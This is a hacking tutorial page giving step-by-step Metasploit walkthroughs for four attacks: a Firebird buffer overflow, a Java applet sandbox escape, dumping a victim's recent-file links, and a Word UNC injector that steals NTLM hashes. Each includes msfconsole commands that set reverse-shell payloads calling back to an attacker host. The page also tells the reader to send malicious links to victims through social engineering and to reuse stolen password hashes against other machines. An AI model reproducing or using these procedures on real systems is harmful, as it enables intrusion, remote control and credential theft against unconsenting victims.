Hack Windows PC using Firebird Relational Database CNCT Group Number Buffer Overflow

This module exploits vulnerability in Firebird SQL Server. A specially crafted packet can be sent which will overwrite a pointer allowing the attacker to control where data is read from. Shortly, following the controlled read, the pointer is called resulting in code execution. The vulnerability exists with a group number extracted from the CNCT information, which is sent by the client, and whose size is not properly checked. This module uses an existing call to memcpy, just prior to the vulnerable code, which allows a small amount of data to be written to the stack. A two-phase stack pivot allows executing the ROP chain which ultimately is used to execute Virtual Alloc and bypass DE

Exploit Targets

Windows FB 2.5.2.26539 (default)

Windows FB 2.5.1.26351

Windows FB 2.1.5.18496

Requirement

Attacker: Backtrack 5

Victim PC: Windows XP

Open backtrack terminal type msfconsole

Now type use exploit/windows/misc/fb_cnct_group

msf exploit (fb_cnct_group)>set payload windows/meterpreter/reverse_tcp

msf exploit (fb_cnct_group)>set lhost 192.168.0.102 (IP of Local Host)

msf exploit (fb_cnct_group)>set rhost 192.168.0.111 (This must be an address on the Remote machine)

msf exploit (fb_cnct_group)>exploit

Exploit Windows, Linux or MAC PC using Java Applet JMX Remote Code Execution

This module abuses the JMX classes from a Java Applet to run arbitrary Java code outside of the sandbox as exploited in the wild in February of 2013. Additionally, this module bypasses default security settings introduced in Java 7 Update 10 to run unsigned applet without displaying any warning to the user.

Exploit Targets

Java 7 Update 10

Windows PC

Linux PC

MAC OS X PC

Requirement

Attacker: Backtrack 5

Victim PC: Windows 7

Open backtrack terminal type msfconsole

Now type use exploit/windows/browser/java_jre17_jmxbean_2

msf exploit (java_jre17_jmxbean_2)>set payload java/shell_reverse_tcp

msf exploit (java_jre17_jmxbean_2)>set lhost 192.168.1.7 (IP of Local Host)

msf exploit (java_jre17_jmxbean_2)>set srvhost 192.168.1.7 (This must be an address on the local machine)

msf exploit (java_jre17_jmxbean_2)>set uripath / (The Url to use for this exploit)

msf exploit (java_jre17_jmxbean_2)>exploit

Now an URL you should give to your victim http://192.168.1.7:8080/

Send the link of the server to the victim via chat or email or any social engineering technique.

Now you have access to the victims PC. Use “Sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID“ 

How to Gather Recent Files Dump of Remote PC

The dumplinks module is a modified port of Harlan Carvey’s lslnk.pl Perl script. This module will parse .lnk files from a user’s Recent Documents folder and Microsoft Office’s Recent Documents folder, if present. Windows creates these link files automatically for many common file types. The .lnk files contain time stamps, file locations, including share names, volume serial numbers, and more.

Exploit Targets

Windows PC

Requirement

Attacker: Backtrack 5

Victim PC: Windows 7

First Hack the Victim PC Using Metaspolit (Tutorial How to Hack Remote PC)

Open backtrack terminal type msfconsole

Now type use post/windows/gather/dumplinks

msf exploit (dumplinks)>set session 1

msf exploit (dumplinks)>exploit  

Hack netNTLM Credential using Microsoft Word UNC Path Injector

This module modifies a .docx file that will, upon opening, submit stored net NTLM credentials to a remote host. It can also create an empty docx file. If emailed the receiver needs to put the document in editing mode before the remote server will be contacted. Preview and read-only mode do not work. Verified to work with Microsoft Word 2003, 2007 and 2010 as of January 2013. In order to get the hashes the auxiliary/server/capture/smb module can be used.

Exploit Targets

Microsoft Word 2003

Microsoft Word 2007

Microsoft Word 2010

Requirement

Attacker: Backtrack 5

Victim PC: Windows 7

First Hack the Victim PC Using Metaspolit (Tutorial How to Hack Remote PC)

Now Open backtrack terminal type msfconsole

Now type use auxiliary/docx/word_unc_injector

msf exploit (word_unc_injector)>set lhost 192.168.1.2 (IP of Local Host)

msf exploit (word_unc_injector)>exploit

Now we successfully generate the malicious docx File, it will stored on your local computer

/root/.msf4/local/msf.docx

Now use ‘upload ‘command to upload the msf.docx in victim pc using

Upload /root/.msf4/local/msf.docx.

Now  use auxiliary/server/capture/smb

msf exploit (smb)>run

When victim open your msf.doc files you will get the password hash after get the victim password hashes, you can  try to connect to another victim use the same password